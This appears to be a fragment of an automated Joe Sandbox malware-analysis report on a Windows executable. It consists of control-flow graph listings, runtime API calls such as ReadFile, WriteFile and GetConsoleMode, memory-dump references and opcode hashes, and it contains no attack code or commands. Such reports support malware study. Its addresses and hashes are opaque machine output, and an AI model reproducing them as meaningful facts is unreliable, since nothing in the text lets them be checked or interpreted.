                                                                                                                                                                                            • Instruction Fuzzy Hash: B051AE62B0969385EB20BB51E8503BAA290FF84794FC44132DE4D87BC9EFBCE565C710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF70127E182,?,?,-00000018,00007FF70127A253,?,?,?,00007FF70127A14A,?,?,?,00007FF7012754A2), ref: 00007FF70127DF64
                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000,?,00007FF70127E182,?,?,-00000018,00007FF70127A253,?,?,?,00007FF70127A14A,?,?,?,00007FF7012754A2), ref: 00007FF70127DF70
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                            • Opcode ID: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
                                                                                                                                                                                            • Instruction ID: 88a2fe3af3ed39a100b518ec4ad299a4682fd7b102ed65ab5d116c4623d75b72
                                                                                                                                                                                            • Opcode Fuzzy Hash: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
                                                                                                                                                                                            • Instruction Fuzzy Hash: F6415661B1AA1782FB16EB569C00676A391BF04BE0FC84535DD0D87788EFBCE845C364
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 685 7ff70127af5c-7ff70127af82 686 7ff70127af9d-7ff70127afa1 685->686 687 7ff70127af84-7ff70127af98 call 7ff701274454 call 7ff701274474 685->687 689 7ff70127b377-7ff70127b383 call 7ff701274454 call 7ff701274474 686->689 690 7ff70127afa7-7ff70127afae 686->690 704 7ff70127b38e 687->704 707 7ff70127b389 call 7ff701279de0 689->707 690->689 692 7ff70127afb4-7ff70127afe2 690->692 692->689 695 7ff70127afe8-7ff70127afef 692->695 698 7ff70127b008-7ff70127b00b 695->698 699 7ff70127aff1-7ff70127b003 call 7ff701274454 call 7ff701274474 695->699 702 7ff70127b373-7ff70127b375 698->702 703 7ff70127b011-7ff70127b017 698->703 699->707 708 7ff70127b391-7ff70127b3a8 702->708 703->702 709 7ff70127b01d-7ff70127b020 703->709 704->708 707->704 709->699 712 7ff70127b022-7ff70127b047 709->712 714 7ff70127b07a-7ff70127b081 712->714 715 7ff70127b049-7ff70127b04b 712->715 716 7ff70127b056-7ff70127b06d call 7ff701274454 call 7ff701274474 call 7ff701279de0 714->716 717 7ff70127b083-7ff70127b0ab call 7ff70127cafc call 7ff701279e48 * 2 714->717 718 7ff70127b04d-7ff70127b054 715->718 719 7ff70127b072-7ff70127b078 715->719 746 7ff70127b200 716->746 748 7ff70127b0ad-7ff70127b0c3 call 7ff701274474 call 7ff701274454 717->748 749 7ff70127b0c8-7ff70127b0f3 call 7ff70127b784 717->749 718->716 718->719 720 7ff70127b0f8-7ff70127b10f 719->720 723 7ff70127b18a-7ff70127b194 call 7ff701282a6c 720->723 724 7ff70127b111-7ff70127b119 720->724 737 7ff70127b21e 723->737 738 7ff70127b19a-7ff70127b1af 723->738 724->723 727 7ff70127b11b-7ff70127b11d 724->727 727->723 731 7ff70127b11f-7ff70127b135 727->731 731->723 735 7ff70127b137-7ff70127b143 731->735 735->723 740 7ff70127b145-7ff70127b147 735->740 742 7ff70127b223-7ff70127b243 ReadFile 737->742 738->737 743 7ff70127b1b1-7ff70127b1c3 GetConsoleMode 738->743 740->723 747 7ff70127b149-7ff70127b161 740->747 750 7ff70127b33d-7ff70127b346 GetLastError 742->750 751 7ff70127b249-7ff70127b251 742->751 743->737 745 7ff70127b1c5-7ff70127b1cd 743->745 745->742 752 7ff70127b1cf-7ff70127b1f1 ReadConsoleW 745->752 755 7ff70127b203-7ff70127b20d call 7ff701279e48 746->755 747->723 756 7ff70127b163-7ff70127b16f 747->756 748->746 749->720 753 7ff70127b348-7ff70127b35e call 7ff701274474 call 7ff701274454 750->753 754 7ff70127b363-7ff70127b366 750->754 751->750 758 7ff70127b257 751->758 761 7ff70127b1f3 GetLastError 752->761 762 7ff70127b212-7ff70127b21c 752->762 753->746 766 7ff70127b36c-7ff70127b36e 754->766 767 7ff70127b1f9-7ff70127b1fb call 7ff7012743e8 754->767 755->708 756->723 765 7ff70127b171-7ff70127b173 756->765 769 7ff70127b25e-7ff70127b273 758->769 761->767 762->769 765->723 773 7ff70127b175-7ff70127b185 765->773 766->755 767->746 769->755 775 7ff70127b275-7ff70127b280 769->775 773->723 776 7ff70127b2a7-7ff70127b2af 775->776 777 7ff70127b282-7ff70127b29b call 7ff70127ab74 775->777 781 7ff70127b32b-7ff70127b338 call 7ff70127a9b4 776->781 782 7ff70127b2b1-7ff70127b2c3 776->782 785 7ff70127b2a0-7ff70127b2a2 777->785 781->785 786 7ff70127b31e-7ff70127b326 782->786 787 7ff70127b2c5 782->787 785->755 786->755 789 7ff70127b2ca-7ff70127b2d1 787->789 790 7ff70127b30d-7ff70127b318 789->790 791 7ff70127b2d3-7ff70127b2d7 789->791 790->786 792 7ff70127b2d9-7ff70127b2e0 791->792 793 7ff70127b2f3 791->793 792->793 794 7ff70127b2e2-7ff70127b2e6 792->794 795 7ff70127b2f9-7ff70127b309 793->795 794->793 796 7ff70127b2e8-7ff70127b2f1 794->796 795->789 797 7ff70127b30b 795->797 796->795 797->786
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: bb836f15fd7b84d0eab272938f235470d80225e915ddf6716f0527cb605fae18
                                                                                                                                                                                            • Instruction ID: 112f127bdbfe204f9376f2538b14e493a58917a3f892a7a8df34b6e260bc45f1
                                                                                                                                                                                            • Opcode Fuzzy Hash: bb836f15fd7b84d0eab272938f235470d80225e915ddf6716f0527cb605fae18
                                                                                                                                                                                            • Instruction Fuzzy Hash: 51C1AF22B0C68792EB61FB1598542BFA6A0FF81B90FD54131DA5E07792CFFCE8558720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 875 7ff70127c460-7ff70127c485 876 7ff70127c48b-7ff70127c48e 875->876 877 7ff70127c753 875->877 879 7ff70127c4c7-7ff70127c4f3 876->879 880 7ff70127c490-7ff70127c4c2 call 7ff701279d14 876->880 878 7ff70127c755-7ff70127c765 877->878 882 7ff70127c4fe-7ff70127c504 879->882 883 7ff70127c4f5-7ff70127c4fc 879->883 880->878 884 7ff70127c506-7ff70127c50f call 7ff70127b820 882->884 885 7ff70127c514-7ff70127c529 call 7ff701282a6c 882->885 883->880 883->882 884->885 890 7ff70127c643-7ff70127c64c 885->890 891 7ff70127c52f-7ff70127c538 885->891 892 7ff70127c64e-7ff70127c654 890->892 893 7ff70127c6a0-7ff70127c6c5 WriteFile 890->893 891->890 894 7ff70127c53e-7ff70127c542 891->894 897 7ff70127c68c-7ff70127c69e call 7ff70127bf18 892->897 898 7ff70127c656-7ff70127c659 892->898 895 7ff70127c6c7-7ff70127c6cd GetLastError 893->895 896 7ff70127c6d0 893->896 899 7ff70127c544-7ff70127c54c call 7ff701273a50 894->899 900 7ff70127c553-7ff70127c55e 894->900 895->896 901 7ff70127c6d3 896->901 916 7ff70127c630-7ff70127c637 897->916 902 7ff70127c65b-7ff70127c65e 898->902 903 7ff70127c678-7ff70127c68a call 7ff70127c138 898->903 899->900 905 7ff70127c560-7ff70127c569 900->905 906 7ff70127c56f-7ff70127c584 GetConsoleMode 900->906 908 7ff70127c6d8 901->908 909 7ff70127c6e4-7ff70127c6ee 902->909 910 7ff70127c664-7ff70127c676 call 7ff70127c01c 902->910 903->916 905->890 905->906 913 7ff70127c63c 906->913 914 7ff70127c58a-7ff70127c590 906->914 917 7ff70127c6dd 908->917 918 7ff70127c74c-7ff70127c751 909->918 919 7ff70127c6f0-7ff70127c6f5 909->919 910->916 913->890 922 7ff70127c619-7ff70127c62b call 7ff70127baa0 914->922 923 7ff70127c596-7ff70127c599 914->923 916->908 917->909 918->878 927 7ff70127c6f7-7ff70127c6fa 919->927 928 7ff70127c723-7ff70127c72d 919->928 922->916 925 7ff70127c59b-7ff70127c59e 923->925 926 7ff70127c5a4-7ff70127c5b2 923->926 925->917 925->926 932 7ff70127c5b4 926->932 933 7ff70127c610-7ff70127c614 926->933 934 7ff70127c6fc-7ff70127c70b 927->934 935 7ff70127c713-7ff70127c71e call 7ff701274430 927->935 930 7ff70127c734-7ff70127c743 928->930 931 7ff70127c72f-7ff70127c732 928->931 930->918 931->877 931->930 936 7ff70127c5b8-7ff70127c5cf call 7ff701282b38 932->936 933->901 934->935 935->928 941 7ff70127c607-7ff70127c60d GetLastError 936->941 942 7ff70127c5d1-7ff70127c5dd 936->942 941->933 943 7ff70127c5fc-7ff70127c603 942->943 944 7ff70127c5df-7ff70127c5f1 call 7ff701282b38 942->944 943->933 946 7ff70127c605 943->946 944->941 948 7ff70127c5f3-7ff70127c5fa 944->948 946->936 948->943
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF70127C44B), ref: 00007FF70127C57C
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF70127C44B), ref: 00007FF70127C607
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                            • Opcode ID: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
                                                                                                                                                                                            • Instruction ID: 40b3bbeb9c246ccb3fde643130487c4c9b9ea12acb9d34c217407648c9d572d6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c9562be74e3e011b14f36cc2d5f23b575e471fae160cb885922e2a719cf7448
                                                                                                                                                                                            • Instruction Fuzzy Hash: CA91C432F1865389F750EF7598802BEABA0BF44B88F945135DE0E63A85DFB8E451C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                            • Opcode ID: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
                                                                                                                                                                                            • Instruction ID: 45105437525d8e3971ca68bc3c4b4309582016beb78f08b106a436638178a41d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bf97934fac92d6cf6f5aeec7a7ab7ef5245e80df15cb27ed03d14056eff3848
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51E473F042138AFB14FB649D456BDA7A5BF10368F914235DE1E92AE5DB78E402C720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                            • Opcode ID: 51761e69b7fc9c64c38c01dbf7f54901531b0c6b0177a242189349bed657362f
                                                                                                                                                                                            • Instruction ID: e7709460287fc21bf79f858a3d53b3343ca1aa1d961810631f11b9f868d7a0ec
                                                                                                                                                                                            • Opcode Fuzzy Hash: 51761e69b7fc9c64c38c01dbf7f54901531b0c6b0177a242189349bed657362f
                                                                                                                                                                                            • Instruction Fuzzy Hash: F0516062F086828AF710FFB1D8513BEB3A5AF44B58F504535DE4D57689DFB8D4418720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1452418845-0
                                                                                                                                                                                            • Opcode ID: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                                            • Instruction ID: d7438f425411577d2a70afb5a69c5111cfa582f67042e2a46eba5e64a84e5f2e
                                                                                                                                                                                            • Opcode Fuzzy Hash: bbd3b8ba5c4b27b365bd4a2e4f7617ab8f70cbce2ec9e80b5769bfa1af1ddc25
                                                                                                                                                                                            • Instruction Fuzzy Hash: B0314A21F0D14385FB64BB649C663BAA391AF91384FC44035E94E876D3DFECA8458371
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                            • Opcode ID: ac9b60a2d89b0b0a1de2f8cf3a80ca4050063b0902c77aa6c040af4779bb7447
                                                                                                                                                                                            • Instruction ID: 1ac48fbc459685311c5736160317b05efbcb1b93aae793960f1b6d836bf02a39
                                                                                                                                                                                            • Opcode Fuzzy Hash: ac9b60a2d89b0b0a1de2f8cf3a80ca4050063b0902c77aa6c040af4779bb7447
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF419262E187C383E754FB21991037AE260FF957A4F509335EA9C03AD1DFACA5E08720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                            • Opcode ID: c535fe1fb7e6e6615454c236fb49958ba2bf46abcf1afe76e887743b7fa28a67
                                                                                                                                                                                            • Instruction ID: 4e27a33de733b938fc552d00e17c16d21f2b27d57c16a70314817c27e7022714
                                                                                                                                                                                            • Opcode Fuzzy Hash: c535fe1fb7e6e6615454c236fb49958ba2bf46abcf1afe76e887743b7fa28a67
                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D0C910F1A70782EB58BB716C9917A92525F48B81F901839C84F87793DFFDA84D4331
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                                                                                            • Instruction ID: 019cd66cb75c7375b0b1f5832023d87c257bb7218604e0b9744e9dfb400bec4d
                                                                                                                                                                                            • Opcode Fuzzy Hash: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5151A661B0928346EF24FE29BE1067AA291EF44BA4F944734DE6D47BD5CFBCD8418620
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize_invalid_parameter_noinfo_set_fmode
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3548387204-0
                                                                                                                                                                                            • Opcode ID: 1e90ea8750eee40ec6509e71a0aeef04b9b8875fa73e4f4fdef0a793ea833389
                                                                                                                                                                                            • Instruction ID: 761bf477e9b84ff16ff89379174f58df3280c0322631d09956a083726762a470
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e90ea8750eee40ec6509e71a0aeef04b9b8875fa73e4f4fdef0a793ea833389
                                                                                                                                                                                            • Instruction Fuzzy Hash: 46119850F0920395FB64B7B54C5A2FED2815F94340FC40474E90E862D3EFDCB8914A72
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF701279ED5,?,?,00000000,00007FF701279F8A), ref: 00007FF70127A0C6
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF701279ED5,?,?,00000000,00007FF701279F8A), ref: 00007FF70127A0D0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1687624791-0
                                                                                                                                                                                            • Opcode ID: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                                            • Instruction ID: 8dae089b709c10e32ef3036af89c80e3979b5325c26c75016702e42811898c32
                                                                                                                                                                                            • Opcode Fuzzy Hash: 92f4f4d1d4744ab8e3e5075f9c3f1c4e1aa1a51ff1876d4144c1ee488cb6abae
                                                                                                                                                                                            • Instruction Fuzzy Hash: C4219F11F1864341FB55F721AC5037EA681AF84BB0FC84639EA2E473D6CFECA4458321
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF70127B7CD), ref: 00007FF70127B680
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF70127B7CD), ref: 00007FF70127B68A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
